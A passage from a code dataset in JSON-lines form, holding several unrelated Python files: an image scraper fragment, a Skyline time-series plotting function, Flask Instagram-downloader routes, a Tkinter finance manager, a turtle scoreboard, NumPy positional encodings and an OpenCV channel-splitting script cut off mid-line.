soup.find_all(\"a\",{\"class\":\"iusc\"}):\r\n #print(a)\r\n # mad = json.loads(a[\"mad\"])\r\n # turl = mad[\"turl\"]\r\n m = json.loads(a[\"m\"])\r\n murl = m[\"murl\"]\r\n turl = m[\"turl\"]\r\n\r\n image_name = urllib.parse.urlsplit(murl).path.split(\"/\")[-1]\r\n\r\n print(w, end=' ')\r\n print(query_name)\r\n\r\n ActualImages.append((image_name, turl, murl))\r\n break\r\n\r\n\r\n #print(\"there are total\" , len(ActualImages),\"images\")\r\n\r\n if not os.path.exists(DIR):\r\n os.mkdir(DIR)\r\n\r\n #DIR = os.path.join(DIR, query.split()[0])\r\n if not os.path.exists(DIR):\r\n os.mkdir(DIR)\r\n\r\n ##print images\r\n for i, (image_name, turl, murl) in enumerate(ActualImages):\r\n try:\r\n\r\n #req = urllib2.Request(turl, headers={'User-Agent' : header})\r\n #raw_img = urllib2.urlopen(req).read()\r\n #req = urllib.request.Request(turl, headers={'User-Agent' : header})\r\n raw_img = urllib.request.urlopen(turl).read()\r\n\r\n cntr = len([i for i in os.listdir(DIR) if image_name in i]) + 1\r\n #print cntr\r\n\r\n f = open(os.path.join(DIR, query_name + \".jpg\"), 'wb')\r\n f.write(raw_img)\r\n f.close()\r\n except Exception as e:\r\n print(\"could not load : \" + query_name)\r\n print(e)\r\n","repo_name":"Gargooie/web_image_scrapper","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4416424946","text":"\"\"\"\nplot_timeseries.py\n\"\"\"\nimport logging\nimport os\nimport traceback\nimport datetime as dt\nimport textwrap\nimport matplotlib\nmatplotlib.use('Agg')\n\nload_libraries = True\nif load_libraries:\n import matplotlib.pyplot as plt\n from matplotlib.pylab import rcParams\n from matplotlib.dates import DateFormatter\n # @added 20230626 - Task #4962: Build and test skyline v4.0.0\n # Task #4778: v4.0.0 - update dependencies\n # As per https://matplotlib.org/stable/api/prev_api_changes/api_changes_3.7.0.html#the-first-parameter-of-axes-grid-and-axis-grid-has-been-renamed-to-visible\n from matplotlib import __version__ as matplotlib_version\n\n\ndef plot_timeseries(\n current_skyline_app, metric, timeseries, output_file,\n plot_parameters={\n 'title': None, 'line_color': 'blue', 'bg_color': 'black',\n 'figsize': (8, 4)\n }):\n \"\"\"\n Creates a png graph image using the time series data and returns the path\n and filename.\n\n :param current_skyline_app: skyline_app\n :param metric: the name of the metric\n :param timeseries: the timeseries to plot\n :param title: the plot title\n :param output_file: the full path and filename (including .png extension) to\n save to plot as\n :type current_skyline_app: str\n :type metric: str\n :type timeseries: list\n :type title: str\n :type output_file: str\n :return: output_file\n :rtype: str\n\n \"\"\"\n\n function_str = 'functions.plot.plot_timeseries'\n current_skyline_app_logger = current_skyline_app + 'Log'\n current_logger = logging.getLogger(current_skyline_app_logger)\n\n if os.path.isfile(output_file):\n current_logger.info('%s :: %s :: image of %s exists' % (\n str(current_skyline_app), function_str, metric))\n return (True, output_file)\n\n current_logger.info('%s :: %s :: plotting %s ' % (\n str(current_skyline_app), function_str, metric))\n\n try:\n current_logger.info('%s :: creating graph image - %s' % (function_str, output_file))\n output_dir = os.path.dirname(output_file)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, mode=0o755)\n\n timeseries_duration = timeseries[-1][0] - timeseries[0][0]\n title = plot_parameters['title']\n if not title:\n if timeseries_duration <= 86400:\n period = timeseries_duration / 60 / 60\n title = '%s hours' % str(period)\n else:\n period = timeseries_duration / 60 / 60 / 24\n title = '%s days' % str(period)\n\n # @added 20230102 - Task #2732: Prometheus to Skyline\n # Branch #4300: prometheus\n # Report correct days for new metrics\n if 'days' in title:\n try:\n replace_days = False\n title_days_str = title.split(' ')[0]\n title_days = float(title_days_str)\n days = round((timeseries_duration / 86400), 1)\n if days < 7.0:\n replace_days = True\n if '30 days' in title and days < title_days:\n replace_days = True\n if replace_days:\n replace_days_str = '%s days' % title_days_str\n new_days_str = '%s days' % str(days)\n title = title.replace(replace_days_str, new_days_str)\n title = '%s - (%s not available)' % (title, replace_days_str)\n current_logger.info('%s :: %s :: corrected duration in title changed %s days to %s days' % (\n str(current_skyline_app), function_str, replace_days_str, new_days_str))\n except Exception as err:\n current_logger.error('%s :: %s :: an error occurred checking days duration in title - %s' % (\n str(current_skyline_app), function_str, err))\n\n # Plot match\n # rcParams['figure.figsize'] = 8, 4\n rcParams['figure.figsize'] = plot_parameters['figsize']\n fig = plt.figure(frameon=False)\n ax = fig.add_subplot(111)\n\n graph_title = str(title)\n title_fontsize = 'medium'\n if len(title) > 200:\n graph_title = textwrap.fill(title, width=140, break_long_words=False)\n title_fontsize = 'xx-small'\n\n fontsize = 'small'\n use_label = str(metric)\n if len(metric) > 200:\n use_label = textwrap.fill(metric, width=140, break_long_words=True)\n fontsize = 'xx-small'\n\n ax.set_title(graph_title, fontsize=title_fontsize)\n if hasattr(ax, 'set_facecolor'):\n ax.set_facecolor(plot_parameters['bg_color'])\n else:\n ax.set_axis_bgcolor(plot_parameters['bg_color'])\n datetimes = [dt.datetime.utcfromtimestamp(int(item[0])) for item in timeseries]\n plt.xticks(rotation=0, horizontalalignment='center')\n if timeseries_duration <= 86400:\n xfmt = DateFormatter('%H:%M:%S')\n else:\n xfmt = DateFormatter('%Y-%m-%d')\n\n plt.gca().xaxis.set_major_formatter(xfmt)\n ax.xaxis.set_major_formatter(xfmt)\n\n values = [float(item[1]) for item in timeseries]\n ax.plot(\n datetimes, values, label=use_label,\n color=plot_parameters['line_color'], lw=1,\n linestyle='solid')\n ax.tick_params(axis='both', labelsize='small')\n try:\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\n except Exception as err:\n current_logger.warning('warning :: %s :: get_major_formatter - %s' % (function_str, err))\n try:\n ax.get_yaxis().get_major_formatter().set_scientific(False)\n except Exception as err:\n current_logger.warning('warning :: %s :: get_major_formatter - %s' % (function_str, err))\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0 + box.height * 0.1,\n box.width, box.height * 0.9])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=2, fontsize=fontsize)\n plt.rc('lines', lw=1, color='black')\n plt.grid(True)\n # @modified 20230626 - Task #4962: Build and test skyline v4.0.0\n # Task #4778: v4.0.0 - update dependencies\n # As per https://matplotlib.org/stable/api/prev_api_changes/api_changes_3.7.0.html#the-first-parameter-of-axes-grid-and-axis-grid-has-been-renamed-to-visible\n if matplotlib_version < '3.7.0':\n ax.grid(b=True, which='both', axis='both', color='lightgray',\n linestyle='solid', alpha=0.5, linewidth=0.6)\n else:\n ax.grid(visible=True, which='both', axis='both', color='lightgray',\n linestyle='solid', alpha=0.5, linewidth=0.6)\n\n if hasattr(ax, 'set_facecolor'):\n ax.set_facecolor(plot_parameters['bg_color'])\n else:\n ax.set_axis_bgcolor(plot_parameters['bg_color'])\n rcParams['xtick.direction'] = 'out'\n rcParams['ytick.direction'] = 'out'\n ax.margins(y=.02, x=.03)\n plt.savefig(output_file, format='png')\n fig.clf()\n plt.close(fig)\n current_logger.info('%s :: created graph image - %s' % (function_str, output_file))\n except:\n current_logger.error(traceback.format_exc())\n current_logger.error('error :: %s :: failed to create %s' % (function_str, output_file))\n return (False, None)\n\n return (True, output_file)\n","repo_name":"earthgecko/skyline","sub_path":"skyline/functions/plots/plot_timeseries.py","file_name":"plot_timeseries.py","file_ext":"py","file_size_in_byte":7563,"program_lang":"python","lang":"en","doc_type":"code","stars":464,"dataset":"github-code","pt":"68"} +{"seq_id":"41175890890","text":"from core import app\nfrom flask import render_template, send_file, request, flash, url_for, redirect, Response\nfrom io import BytesIO\nfrom decouple import config\nimport os\nfrom core import ig\nimport shutil\n\n\nIG_USERNAME = config('IG_USERNAME', default='username')\nIG_PASSWORD = config('IG_PASSWORD', default='password')\n\n\n@app.route('/ig-downloader/profile-pic', methods=['GET', 'POST'])\ndef ig_dp_downloader():\n if request.method == 'POST':\n try:\n username = request.form.get('username')\n if 'instagram.com' in username:\n flash('Please enter Instagram username, and not a link!', 'error')\n return redirect(url_for('ig_dp_downloader'))\n filename = ig.download_profile_picture(username)\n file_path = os.path.join(os.path.abspath(username), filename)\n return_img = BytesIO()\n with open(file_path, 'rb') as fp:\n return_img.write(fp.read())\n return_img.seek(0)\n os.remove(file_path)\n os.removedirs(os.path.abspath(username))\n return send_file(return_img, mimetype='image/jpg', as_attachment=True, attachment_filename=f'{username}.jpg')\n except Exception as e:\n print(e)\n flash('Unable to fetch and download the profile picture, try again!', 'error')\n return redirect(url_for('ig_dp_downloader'))\n\n return render_template('instagram/profile_pic.html', title=\"Download Profile Picture\")\n\n\n@app.route('/ig-downloader/latest-stories', methods=['GET', 'POST'])\ndef ig_stories_downloader():\n if request.method == 'POST':\n try:\n username = request.form.get('username')\n if 'instagram.com' in username:\n flash('Please enter Instagram username, and not a link!', 'error')\n return redirect(url_for('ig_dp_downloader'))\n filename = ig.download_latest_stories(username)\n with open(os.path.abspath(filename), 'rb') as fp:\n data = fp.readlines()\n os.remove(os.path.abspath(filename))\n return Response(\n data,\n headers={\n 'Content-Type': 'application/zip',\n 'Content-Disposition': f'attachment; filename={filename}'\n }\n )\n except Exception as e:\n print(e)\n flash('Unable to fetch and download the stories, try again!', 'error')\n return redirect(url_for('ig_stories_downloader'))\n\n return render_template('instagram/stories.html', title=\"Download Latest Stories\")\n\n\n@app.route('/ig-downloader/image', methods=['GET', 'POST'])\ndef ig_image_downloader():\n if request.method == 'POST':\n try:\n post_url = request.form.get('post-url')\n post_url = post_url.replace(\n \"https://instagram\", \"https://www.instagram\")\n post_url = post_url.replace(\n \"https://m.instagram\", \"https://www.instagram\")\n filename = ig.download_image(post_url)\n if filename:\n if 'jpg' in filename:\n return_img = BytesIO()\n with open(filename, 'rb') as fp:\n return_img.write(fp.read())\n return_img.seek(0)\n os.remove(filename)\n return send_file(return_img, mimetype='image/jpg', as_attachment=True, attachment_filename=filename)\n elif 'zip' in filename:\n with open(os.path.abspath(filename), 'rb') as fp:\n data = fp.readlines()\n os.remove(os.path.abspath(filename))\n return Response(\n data,\n headers={\n 'Content-Type': 'application/zip',\n 'Content-Disposition': f'attachment; filename={filename}'\n }\n )\n else:\n flash(\n 'Please make sure the account is not private and the post contains image only!', 'error')\n return redirect(url_for('ig_image_downloader'))\n except Exception as e:\n print(e)\n flash('Unable to fetch and download the profile picture, try again!', 'error')\n return redirect(url_for('ig_image_downloader'))\n\n return render_template('instagram/picture.html', title='Download Images')\n\n\n@app.route('/ig-downloader/video', methods=['GET', 'POST'])\ndef ig_video_downloader():\n if request.method == 'POST':\n try:\n video_url = request.form.get('video-url')\n video_url = video_url.replace(\n \"https://instagram\", \"https://www.instagram\")\n video_url = video_url.replace(\n \"https://m.instagram\", \"https://www.instagram\")\n folder_name = ig.download_video(video_url)\n\n # Delete after sending\n\n for (dirpath, dirnames, filenames) in os.walk(os.path.abspath(folder_name)):\n if not 'temp' in filenames[0]:\n return_video = BytesIO()\n with open(os.path.join(os.path.abspath(folder_name), filenames[0]), 'rb') as fp:\n return_video.write(fp.read())\n return_video.seek(0)\n shutil.rmtree(os.path.abspath(folder_name))\n return send_file(return_video, as_attachment=True, attachment_filename=f'{folder_name}.mp4')\n except Exception as e:\n print(e)\n flash('Unable to fetch and download the video, try again!', 'error')\n return redirect(url_for('ig_video_downloader'))\n\n return render_template('instagram/video.html', title='Download Videos')\n","repo_name":"ashutoshkrris/EazyLoader","sub_path":"core/routes/instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"68"} +{"seq_id":"42989413571","text":"# -*- coding: utf-8 -*-\nfrom functools import partial\nimport Tkinter as tk\nimport tkMessageBox\nfrom my_finance.model import User, Finance\n\ncurrent_user = None\ncurrent_finance = None\n\nTITLE_FONT = ('Helvetica', 18, 'bold')\nCONS_SEX = dict([(1, u'男'), (2, u'女')])\nCONS_TYPE = dict([(1, u'收入'), (2, u'支出')])\n\nSTICKY_W_E_N_S = tk.W+tk.E+tk.N+tk.S\n\n\nclass App(tk.Tk):\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n container = tk.Frame(self)\n container.pack(side='top', fill='both', expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n self.container = container\n self.frames = {}\n\n def set_pages(self, pages, force_update=False):\n for F in pages:\n page_name = F.__name__\n if page_name in self.frames and not force_update:\n continue\n frame = F(self.container, self)\n self.frames[page_name] = frame\n frame.grid(row=0, column=0, sticky='nsew')\n\n def show_frame(self, page_name):\n frame = self.frames[page_name]\n frame.tkraise()\n\n\nclass LoginPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n tk.Label(self, text=u'用户名:').grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'密 码:').grid(row=1, sticky=tk.W)\n\n usernameinput = tk.Entry(self)\n usernameinput.grid(row=0, column=1, columnspan=2)\n passwdinput = tk.Entry(self, show='*')\n passwdinput.grid(row=1, column=1, columnspan=2)\n\n def clear_callback():\n usernameinput.delete(0, tk.END)\n passwdinput.delete(0, tk.END)\n\n def login_callback():\n username = usernameinput.get()\n username = username.strip()\n passwd = passwdinput.get()\n passwd = passwd.strip()\n\n global current_user\n current_user = User.login(username, passwd)\n if current_user:\n self.controller.set_pages([HomePage])\n self.controller.show_frame('HomePage')\n else:\n tkMessageBox.showinfo('Error', 'Login Failure!')\n\n tk.Button(self, text=u'登 录', command=login_callback).grid(row=2, column=1)\n tk.Button(self, text=u'清 空', command=clear_callback).grid(row=2, column=2)\n\n\nclass HomePage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n global current_user\n tk.Label(self, text=u'姓 名: %s' % current_user.name).grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'性 别: %s' % CONS_SEX[current_user.sex]).grid(row=1, sticky=tk.W)\n tk.Label(self, text=u'注册时间: %s' % current_user.create_date).grid(row=2, sticky=tk.W)\n\n def edit_user_callback():\n self.controller.set_pages([UserEditPage])\n self.controller.show_frame('UserEditPage')\n\n tk.Button(self, text='编辑', command=edit_user_callback).grid(row=0, column=1)\n\n finance_list = Finance.get_list(current_user.id)\n\n def add_finance_callback():\n self.controller.set_pages([FinanceAddPage])\n self.controller.show_frame('FinanceAddPage')\n\n def delete_finance_callback(fid):\n Finance.delete(fid)\n self.controller.set_pages([HomePage], force_update=True)\n\n def edit_finance_callback(fid):\n global current_finance\n current_finance = Finance.get(fid)\n self.controller.set_pages([FinanceEditPage], force_update=True)\n self.controller.show_frame('FinanceEditPage')\n\n if finance_list:\n finance_list_length = len(finance_list)\n total_input = 0\n total_output = 0\n\n tk.Label(self, text=u'').grid(row=4)\n tk.Label(self, text=u'添加时间', bg='green').grid(row=5, column=0, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=u'类型', bg='green').grid(row=5, column=1, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=u'金额', bg='green').grid(row=5, column=2, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=u'注释', bg='green').grid(row=5, column=3, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=u'操作', bg='green').grid(row=5, column=4, columnspan=2, sticky=STICKY_W_E_N_S)\n for idx, finance in enumerate(finance_list):\n if finance.type == 1:\n total_input += finance.amount\n elif finance.type == 2:\n total_output += finance.amount\n\n if idx % 2 == 0:\n tk.Label(self, text=finance.create_date).grid(row=6 + idx, column=0, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=CONS_TYPE[finance.type]).grid(row=6 + idx, column=1, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=finance.amount).grid(row=6 + idx, column=2, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=finance.comments).grid(row=6 + idx, column=3, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='编辑', command=partial(edit_finance_callback, finance.id)).grid(row=6 + idx, column=4, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='删除', command=partial(delete_finance_callback, finance.id)).grid(row=6 + idx, column=5, sticky=STICKY_W_E_N_S)\n else:\n tk.Label(self, text=finance.create_date, bg='gray').grid(row=6 + idx, column=0, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=CONS_TYPE[finance.type], bg='gray').grid(row=6 + idx, column=1, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=finance.amount, bg='gray').grid(row=6 + idx, column=2, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=finance.comments, bg='gray').grid(row=6 + idx, column=3, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='编辑', command=partial(edit_finance_callback, finance.id), bg='gray').grid(row=6 + idx, column=4, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='删除', command=partial(delete_finance_callback, finance.id), bg='gray').grid(row=6 + idx, column=5, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='添加', command=add_finance_callback).grid(row=6 + finance_list_length, sticky=tk.W)\n tk.Label(self, text='总收入: %s' % total_input).grid(row=7 + finance_list_length, sticky=tk.W)\n tk.Label(self, text='总支出: %s' % total_output).grid(row=8 + finance_list_length, sticky=tk.W)\n else:\n tk.Label(self, text=u'你还没有个人财务记录', bg='red').grid(row=4, sticky=tk.W)\n tk.Button(self, text='添加', command=add_finance_callback).grid(row=5, sticky=tk.W)\n\n\nclass FinanceAddPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n tk.Label(self, text=u'类 型:').grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'金 额:').grid(row=1, sticky=tk.W)\n tk.Label(self, text=u'注 释:').grid(row=2, sticky=tk.W)\n\n v = tk.StringVar()\n v.set(1)\n inputraido = tk.Radiobutton(self, text=u'收入', variable=v, value=1)\n inputraido.grid(row=0, column=1, sticky=tk.W)\n outputradio = tk.Radiobutton(self, text=u'支出', variable=v, value=2)\n outputradio.grid(row=0, column=2, sticky=tk.W)\n\n amountinput = tk.Entry(self)\n amountinput.grid(row=1, column=1, columnspan=2, sticky=tk.W)\n\n commentstext = tk.Entry(self)\n commentstext.grid(row=2, column=1, columnspan=2, sticky=tk.W)\n\n def save_add_callback():\n type = int(v.get())\n amount = float(amountinput.get())\n comments = commentstext.get()\n comments = comments.strip()\n\n data = {\n 'type': type,\n 'amount': amount,\n 'comments': comments,\n }\n Finance.add(current_user.id, data)\n self.controller.set_pages([HomePage], force_update=True)\n self.controller.show_frame('FinanceAddPage')\n\n def add_back_callback():\n save_add_callback()\n self.controller.show_frame('HomePage')\n\n def cancel_add_callback():\n self.controller.show_frame('HomePage')\n\n tk.Button(self, text=u'保存&继续添加', command=save_add_callback).grid(row=3, column=0)\n tk.Button(self, text=u'添加&返回', command=add_back_callback).grid(row=3, column=1)\n tk.Button(self, text=u'返回', command=cancel_add_callback).grid(row=3, column=2)\n\n\nclass FinanceEditPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n global current_finance\n tk.Label(self, text=u'类 型:').grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'金 额:').grid(row=1, sticky=tk.W)\n tk.Label(self, text=u'注 释:').grid(row=2, sticky=tk.W)\n\n v = tk.StringVar()\n v.set(current_finance.type)\n inputraido = tk.Radiobutton(self, text=u'收入', variable=v, value=1)\n inputraido.grid(row=0, column=1, sticky=tk.W)\n outputradio = tk.Radiobutton(self, text=u'支出', variable=v, value=2)\n outputradio.grid(row=0, column=2, sticky=tk.W)\n\n amountinput = tk.Entry(self)\n amountinput.insert(tk.END, current_finance.amount)\n amountinput.grid(row=1, column=1, columnspan=2, sticky=tk.W)\n\n commentstext = tk.Entry(self)\n commentstext.insert(tk.END, current_finance.comments)\n commentstext.grid(row=2, column=1, columnspan=2, sticky=tk.W)\n\n def save_callback():\n type = int(v.get())\n amount = float(amountinput.get())\n comments = commentstext.get()\n comments = comments.strip()\n\n current_finance.type = type\n current_finance.amount = amount\n current_finance.comments = comments\n Finance.update(current_finance)\n self.controller.set_pages([HomePage], force_update=True)\n self.controller.show_frame('FinanceEditPage')\n\n def save_back_callback():\n save_callback()\n self.controller.show_frame('HomePage')\n\n def cancel_edit_callback():\n self.controller.show_frame('HomePage')\n\n tk.Button(self, text=u'保存', command=save_callback).grid(row=3, column=0)\n tk.Button(self, text=u'保存&返回', command=save_back_callback).grid(row=3, column=1)\n tk.Button(self, text=u'返回', command=cancel_edit_callback).grid(row=3, column=2)\n\n\nclass UserEditPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n global current_user\n tk.Label(self, text=u'姓 名:').grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'性 别:').grid(row=1, sticky=tk.W)\n\n nameinput = tk.Entry(self)\n nameinput.insert(tk.END, current_user.name)\n nameinput.grid(row=0, column=1, columnspan=2, sticky=tk.W)\n\n v = tk.StringVar()\n v.set(current_user.sex)\n maleraido = tk.Radiobutton(self, text=u'男', variable=v, value=1)\n maleraido.grid(row=1, column=1, sticky=tk.W)\n femaleradio = tk.Radiobutton(self, text=u'女', variable=v, value=2)\n femaleradio.grid(row=1, column=2, sticky=tk.W)\n\n def save_callback():\n name = nameinput.get()\n name = name.strip()\n sex = int(v.get())\n\n current_user.name = name\n current_user.sex = sex\n User.update(current_user)\n self.controller.set_pages([HomePage], force_update=True)\n self.controller.show_frame('UserEditPage')\n\n def save_back_callback():\n save_callback()\n self.controller.show_frame('HomePage')\n\n def cancel_edit_callback():\n self.controller.show_frame('HomePage')\n\n tk.Button(self, text=u'保存', command=save_callback).grid(row=2, column=0)\n tk.Button(self, text=u'保存&返回', command=save_back_callback).grid(row=2, column=1)\n tk.Button(self, text=u'返回', command=cancel_edit_callback).grid(row=2, column=2)\n\n\ndef run():\n app = App()\n app.set_pages([LoginPage])\n app.show_frame('LoginPage')\n\n app.title(u'个人财务管理系统')\n app.geometry('640x480')\n app.resizable(width=True, height=True)\n app.mainloop()\n","repo_name":"thrbowl/my_finance","sub_path":"my_finance/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":12636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15979091360","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 20, \"bold\")\n\n\nclass Scoreboard(Turtle):\n \n def __init__(self):\n super().__init__()\n self.level = 1\n self.create()\n\n def create(self):\n self.hideturtle()\n self.penup()\n self.color(\"black\")\n self.setposition(-280, 260)\n self.write(f\"Level: {self.level}\", False, \"left\", FONT)\n\n def update(self):\n super().clear()\n self.level += 1\n self.create()\n\n def game_over(self):\n self.setposition(0, 0)\n self.write(f\"Game Over!\\nMax level: {self.level}\", False, \"center\", FONT)\n","repo_name":"Mohamed-Aladdin/Coding-Projects","sub_path":"100 Days of Code/turtle-crossing-start/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17724417087","text":"import numpy as np\nfrom scipy import special\nfrom scipy import signal\nimport math\n\n\ndef positionencoding1D(W, L):\n\n x_linspace = (np.linspace(0, W - 1, W) / W) * 2 - 1\n\n x_el = []\n\n x_el_hf = []\n\n pe_1d = np.zeros((W, 2*L+1))\n # cache the values so you don't have to do function calls at every pixel\n for el in range(0, L):\n val = 2 ** el\n\n x = np.sin(val * np.pi * x_linspace)\n x_el.append(x)\n\n x = np.cos(val * np.pi * x_linspace)\n x_el_hf.append(x)\n\n\n for x_i in range(0, W):\n\n p_enc = []\n\n for li in range(0, L):\n p_enc.append(x_el[li][x_i])\n p_enc.append(x_el_hf[li][x_i])\n\n p_enc.append(x_linspace[x_i])\n\n pe_1d[x_i] = np.array(p_enc)\n\n return pe_1d.astype('float32')\n\n\n\ndef positionencoding2D(W, H, L, basis_function,epoch):\n\n fre=np.clip(epoch/30000,0,1)\n x_linspace = (np.linspace(0, W - 1, W) / W) * 2 - 1\n y_linspace = (np.linspace(0, H - 1, H) / H) * 2 - 1\n\n x_el = []\n y_el = []\n\n x_el_hf = []\n y_el_hf = []\n\n pe_2d = np.zeros((W, H, 4*L+2))\n # cache the values so you don't have to do function calls at every pixel\n for el in range(0, L):\n val = 2 ** el\n\n if basis_function == 'rbf':\n\n # Trying Random Fourier Features https://www.cs.cmu.edu/~schneide/DougalRandomFeatures_UAI2015.pdf\n # and https://gist.github.com/vvanirudh/2683295a198a688ef3c49650cada0114\n\n # Instead of a phase shift of pi/2, we could randomise it [-pi, pi]\n\n M_1 = np.random.rand(2, 2)\n\n phase_shift = np.random.rand(1) * np.pi\n\n x_1_y_1 = np.sin(val * np.matmul(M_1, np.vstack((x_linspace, y_linspace))))\n x_el.append(x_1_y_1[0, :])\n y_el.append(x_1_y_1[1, :])\n\n x_1_y_1 = np.sin(val * np.matmul(M_1, np.vstack((x_linspace, y_linspace))) + phase_shift)\n x_el_hf.append(x_1_y_1[0, :])\n y_el_hf.append(x_1_y_1[1, :])\n\n elif basis_function == 'diric':\n\n x = special.diric(np.pi * x_linspace, val)\n x_el.append(x)\n\n x = special.diric(np.pi * x_linspace + np.pi / 2.0, val)\n x_el_hf.append(x)\n\n y = special.diric(np.pi * y_linspace, val)\n y_el.append(y)\n\n y = special.diric(np.pi * y_linspace + np.pi / 2.0, val)\n y_el_hf.append(y)\n\n elif basis_function == 'sawtooth':\n x = signal.sawtooth(val * np.pi * x_linspace)\n x_el.append(x)\n\n x = signal.sawtooth(val * np.pi * x_linspace + np.pi / 2.0)\n x_el_hf.append(x)\n\n y = signal.sawtooth(val * np.pi * y_linspace)\n y_el.append(y)\n\n y = signal.sawtooth(val * np.pi * y_linspace + np.pi / 2.0)\n y_el_hf.append(y)\n\n elif basis_function == 'sin_cos':\n\n x = np.sin(val * np.pi * x_linspace)\n x_el.append(x)\n\n x = np.cos(val * np.pi * x_linspace)\n x_el_hf.append(x)\n\n y = np.sin(val * np.pi * y_linspace)\n y_el.append(y)\n\n y = np.cos(val * np.pi * y_linspace)\n y_el_hf.append(y)\n\n for y_i in range(0, H):\n for x_i in range(0, W):\n\n p_enc = []\n\n for li in range(0, L):\n p_enc.append(x_el[li][x_i])\n p_enc.append(x_el_hf[li][x_i])\n\n p_enc.append(y_el[li][y_i])\n p_enc.append(y_el_hf[li][y_i])\n\n p_enc.append(x_linspace[x_i])\n p_enc.append(y_linspace[y_i])\n\n pe_2d[x_i, y_i] = np.array(p_enc)\n\n return pe_2d.astype('float32')\n\n\n\ndef positionencoding3D(W, H, D, L1, L2):\n\n x_linspace = (np.linspace(0, W - 1, W) / W) * 2 - 1\n y_linspace = (np.linspace(0, H - 1, H) / H) * 2 - 1\n z_linspace = (np.linspace(0, D - 1, D) / D) * 2 - 1\n\n x_el = []\n y_el = []\n z_el = []\n\n x_el_hf = []\n y_el_hf = []\n z_el_hf = []\n\n pe_3d = np.zeros((W, H, D, 4*L1+3+2*L2))\n # cache the values so you don't have to do function calls at every pixel\n for el in range(0, L1):\n val = 2 ** el\n\n x = np.sin(val * np.pi * x_linspace)\n x_el.append(x)\n\n x = np.cos(val * np.pi * x_linspace)\n x_el_hf.append(x)\n\n y = np.sin(val * np.pi * y_linspace)\n y_el.append(y)\n\n y = np.cos(val * np.pi * y_linspace)\n y_el_hf.append(y)\n\n if el < L2:\n z = np.sin(val * np.pi * z_linspace)\n z_el.append(z)\n\n z = np.cos(val * np.pi * z_linspace)\n z_el_hf.append(z)\n\n\n for z_i in range(0, D):\n for y_i in range(0, H):\n for x_i in range(0, W):\n\n p_enc = []\n\n for li in range(0, L1):\n p_enc.append(x_el[li][x_i])\n p_enc.append(x_el_hf[li][x_i])\n\n p_enc.append(y_el[li][y_i])\n p_enc.append(y_el_hf[li][y_i])\n\n if li < L2:\n p_enc.append(z_el[li][z_i])\n p_enc.append(z_el_hf[li][z_i])\n\n p_enc.append(x_linspace[x_i])\n p_enc.append(y_linspace[y_i])\n p_enc.append(z_linspace[z_i])\n\n pe_3d[x_i, y_i, z_i] = np.array(p_enc)\n\n return pe_3d.astype('float32')","repo_name":"meixiaoyinn/CEINR","sub_path":"PositionEncoding.py","file_name":"PositionEncoding.py","file_ext":"py","file_size_in_byte":5309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"30157363064","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport cv2\n\ncv2.namedWindow(\"image\", cv2.WINDOW_NORMAL) # Create window with freedom of dimensions\nim = cv2.imread(\"1.jpeg\") # Read image\nimS = cv2.resize(im, (348, 464)) # Resize image\ncv2.imshow(\"image\", imS) # Show image\ncv2.waitKey(0) \ncv2.destroyAllWindows()\n\nb = imS.copy()\n# set green and red channels to 0\nb[:, :, 1] = 0\nb[:, :, 2] = 0\n\n\ng = imS.copy()\n# set blue and red channels to 0\ng[:, :, 0] = 0\ng[:, :, 2] = 0\n\nr = imS.copy()\n# set blue and green channels to 0\nr[:, :, 0] = 0\nr[:, :, 1] = 0\n\n\n# RGB - Blue\nbrgb=cv2.imshow('B-RGB', b)\ncv2.imwrite('brgb.jpeg', b)\n# RGB - Green\ngrgb=cv2.imshow('G-RGB', g)\ncv2.imwrite('grgb.jpeg',g)\n# RGB - Red\nrrgb=cv2.imshow('R-RGB', r)\ncv2.imwrite('rrgb.jpeg', r)\n\nb=cv2.imshow('Blue Channel', 